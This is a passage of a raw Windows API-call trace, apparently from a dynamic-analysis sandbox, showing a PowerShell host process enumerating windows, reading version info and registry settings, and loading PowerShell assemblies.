	[0939.673] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa88
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa6c
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa68
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x9f8
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xa04
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x924
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x8dc
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x7dc
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x768
	[0939.673] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x764
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x820
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x810
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x794
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x83c
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x7ac
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xb44
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x6bc
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0xb5c
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x838
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.674] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x4d0
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x818
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x5b8
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x494
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x1ec
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x440
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x7e8
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x730
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x2c8
	[0939.675] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d7e0 | out: lpdwProcessId=0x14d7e0) returned 0x31c
	[0939.679] WerSetFlags () returned 0x0
	[0939.833] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0939.833] CoTaskMemFree (pv=0x0) 
	[0939.834] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14db48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14db40 | out: pulNumLanguages=0x14db48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14db40) returned 1
	[0939.834] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14db48, pwszLanguagesBuffer=0x2ebf478, pcchLanguagesBuffer=0x14db40 | out: pulNumLanguages=0x14db48, pwszLanguagesBuffer=0x2ebf478, pcchLanguagesBuffer=0x14db40) returned 1
	[0939.839] CoTaskMemAlloc (cb=0x24) returned 0x3d1680
	[0939.839] GetUserDefaultLocaleName (in: lpLocaleName=0x3d1680, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0939.840] CoTaskMemFree (pv=0x3d1680) 
	[0939.864] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0939.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.865] CoTaskMemFree (pv=0x330180) 
	[0939.867] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0939.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.867] CoTaskMemFree (pv=0x330180) 
	[0939.869] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0939.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.869] CoTaskMemFree (pv=0x330180) 
	[0940.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.017] SetErrorMode (uMode=0x1) returned 0x1
	[0940.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d7c0 | out: lpFileInformation=0x14d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0940.018] SetErrorMode (uMode=0x1) returned 0x1
	[0940.018] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14da30 | out: lpdwHandle=0x14da30) returned 0x94c
	[0940.019] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ec2d08 | out: lpData=0x2ec2d08) returned 1
	[0940.020] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d9a8, puLen=0x14d9a0 | out: lplpBuffer=0x14d9a8*=0x2ec2da4, puLen=0x14d9a0) returned 1
	[0940.020] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2e80, puLen=0x14d910) returned 1
	[0940.020] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0940.020] CoTaskMemAlloc (cb=0x2e) returned 0x3d0980
	[0940.020] lstrcpyW (in: lpString1=0x3d0980, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0940.020] CoTaskMemFree (pv=0x3d0980) 
	[0940.020] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2ed4, puLen=0x14d910) returned 1
	[0940.020] lstrlenW (lpString="System.Management.Automation") returned 28
	[0940.020] CoTaskMemAlloc (cb=0x3c) returned 0x383260
	[0940.020] lstrcpyW (in: lpString1=0x383260, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0940.020] CoTaskMemFree (pv=0x383260) 
	[0940.020] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2f30, puLen=0x14d910) returned 1
	[0940.020] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.020] CoTaskMemAlloc (cb=0x20) returned 0x3d16e0
	[0940.020] lstrcpyW (in: lpString1=0x3d16e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.020] CoTaskMemFree (pv=0x3d16e0) 
	[0940.020] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2f70, puLen=0x14d910) returned 1
	[0940.020] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.020] CoTaskMemAlloc (cb=0x44) returned 0x383260
	[0940.020] lstrcpyW (in: lpString1=0x383260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.020] CoTaskMemFree (pv=0x383260) 
	[0940.021] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2fd8, puLen=0x14d910) returned 1
	[0940.021] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0940.021] CoTaskMemAlloc (cb=0x76) returned 0x36ec30
	[0940.021] lstrcpyW (in: lpString1=0x36ec30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0940.021] CoTaskMemFree (pv=0x36ec30) 
	[0940.021] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec3074, puLen=0x14d910) returned 1
	[0940.021] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.021] CoTaskMemAlloc (cb=0x44) returned 0x383260
	[0940.021] lstrcpyW (in: lpString1=0x383260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.021] CoTaskMemFree (pv=0x383260) 
	[0940.021] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec30d8, puLen=0x14d910) returned 1
	[0940.021] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0940.021] CoTaskMemAlloc (cb=0x58) returned 0x38d8b0
	[0940.021] lstrcpyW (in: lpString1=0x38d8b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0940.021] CoTaskMemFree (pv=0x38d8b0) 
	[0940.021] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec3154, puLen=0x14d910) returned 1
	[0940.021] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.021] CoTaskMemAlloc (cb=0x20) returned 0x3d16e0
	[0940.021] lstrcpyW (in: lpString1=0x3d16e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.021] CoTaskMemFree (pv=0x3d16e0) 
	[0940.021] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x2ec2dfc, puLen=0x14d910) returned 1
	[0940.022] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0940.022] CoTaskMemAlloc (cb=0x66) returned 0x3c6210
	[0940.022] lstrcpyW (in: lpString1=0x3c6210, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0940.022] CoTaskMemFree (pv=0x3c6210) 
	[0940.022] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x0, puLen=0x14d910) returned 0
	[0940.022] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x0, puLen=0x14d910) returned 0
	[0940.022] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d918, puLen=0x14d910 | out: lplpBuffer=0x14d918*=0x0, puLen=0x14d910) returned 0
	[0940.022] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d8e8, puLen=0x14d8e0 | out: lplpBuffer=0x14d8e8*=0x2ec2da4, puLen=0x14d8e0) returned 1
	[0940.022] CoTaskMemAlloc (cb=0x204) returned 0x3718f0
	[0940.022] VerLanguageNameW (in: wLang=0x0, szLang=0x3718f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0940.022] CoTaskMemFree (pv=0x3718f0) 
	[0940.022] VerQueryValueW (in: pBlock=0x2ec2d08, lpSubBlock="\\", lplpBuffer=0x14d938, puLen=0x14d930 | out: lplpBuffer=0x14d938*=0x2ec2d30, puLen=0x14d930) returned 1
	[0940.029] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0940.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.029] CoTaskMemFree (pv=0x330180) 
	[0940.030] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0940.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.030] CoTaskMemFree (pv=0x330180) 
	[0940.036] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d808 | out: phkResult=0x14d808*=0x2e8) returned 0x0
	[0940.037] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d7f8 | out: phkResult=0x14d7f8*=0x2ec) returned 0x0
	[0940.037] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d888 | out: phkResult=0x14d888*=0x2f0) returned 0x0
	[0940.039] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7cc, lpData=0x0, lpcbData=0x14d7c8*=0x0 | out: lpType=0x14d7cc*=0x1, lpData=0x0, lpcbData=0x14d7c8*=0x56) returned 0x0
	[0940.040] CoTaskMemAlloc (cb=0x5a) returned 0x3c61a0
	[0940.040] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d79c, lpData=0x3c61a0, lpcbData=0x14d798*=0x56 | out: lpType=0x14d79c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d798*=0x56) returned 0x0
	[0940.040] CoTaskMemFree (pv=0x3c61a0) 
	[0940.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.229] CoTaskMemAlloc (cb=0x104) returned 0x330180
	[0940.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.229] CoTaskMemFree (pv=0x330180) 
	[0940.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0940.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0940.691] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0940.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.691] CoTaskMemFree (pv=0x330290) 
	[0940.693] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0940.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.693] CoTaskMemFree (pv=0x330290) 
	[0940.833] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0940.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.834] CoTaskMemFree (pv=0x330290) 
	[0940.834] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0940.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.834] CoTaskMemFree (pv=0x330290) 
	[0940.834] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0940.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.835] CoTaskMemFree (pv=0x330290) 
	[0941.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0941.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0941.328] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0941.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.329] CoTaskMemFree (pv=0x330290) 
	[0941.331] CoTaskMemAlloc (cb=0x104) returned 0x330290
	[0941.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x330290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.331] CoTaskMemFree (pv=0x330290) 
	[0941.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.944] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0944.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.945] CoTaskMemFree (pv=0x3304b0) 
	[0944.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0944.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0944.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0944.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0944.984] SetErrorMode (uMode=0x1) returned 0x1
	[0944.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d760 | out: lpFileInformation=0x14d760*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0944.984] SetErrorMode (uMode=0x1) returned 0x1
	[0973.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
